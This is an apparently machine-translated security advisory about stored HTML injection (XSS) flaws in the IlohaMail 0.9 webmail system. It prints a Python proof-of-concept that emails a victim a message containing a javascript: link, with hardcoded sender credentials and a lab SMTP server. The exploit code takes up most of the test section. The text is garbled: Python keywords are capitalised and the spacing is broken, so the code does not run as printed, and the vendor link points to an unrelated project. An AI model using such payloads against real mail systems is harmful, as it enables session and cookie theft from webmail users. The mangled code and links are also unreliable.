Release date:
Updated on:
Affected Systems:
Sourceforge IlohaMail 0.9-20050415
Description:
--------------------------------------------------------------------------------
Bugtraq id: 55096
IlohaMail is a lightweight and functional webmail system that supports multiple languages.
IlohaMail 0.9-20050415 and other versions have multiple HTML Injection Vulnerabilities. These vulnerabilities allow attackers to execute HTML and script code on the affected sites, attackers can steal Cookie authentication creden。 or control the appearance of the site.
<* Source: Shai rod
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Shai rod () provides the following test methods:
Import smtplib
Print "###################################### #########"
Print "# IlohaMail Stored xss poc #"
Print "# Coded by: Shai rod #"
Print "# @ maid #"
Print "# http://exploit.co.il #"
Print "# For Educational Purposes Only! #"
Print "###################################### ######### \ r \ n"
# SETTINGS
Sender = "attacker @ localhost"
Smtp_login = sender
Smtp_password = "qwe123"
Recipient = "victim @ localhost"
Smtp_server = "192.168.1.10"
Smtp_port = 25
Subject = "IlohaMail Webmail xss poc"
# SEND E-MAIL
Print "[*] Sending E-mail to" + recipient + "..."
Msg = ("From: % s \ r \ nTo: % s \ r \ nSubject: % s \ n"
% (Sender, ",". join (recipient), subject ))
Msg + = "Content-type: text/html \ n"
Msg + = "<a href = javascript: alert (" XSS ")> Click Me, Please... </a> \ r \ n """
Server = smtplib. SMTP (smtp_server, smtp_port)
Server. ehlo ()
Server. starttls ()
Server. login (smtp_login, smtp_password)
Server. sendmail (sender, recipient, msg)
Server. quit ()
Print "[+] E-mail sent! "
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Sourceforge
-----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://jocr.sourceforge.net/index.html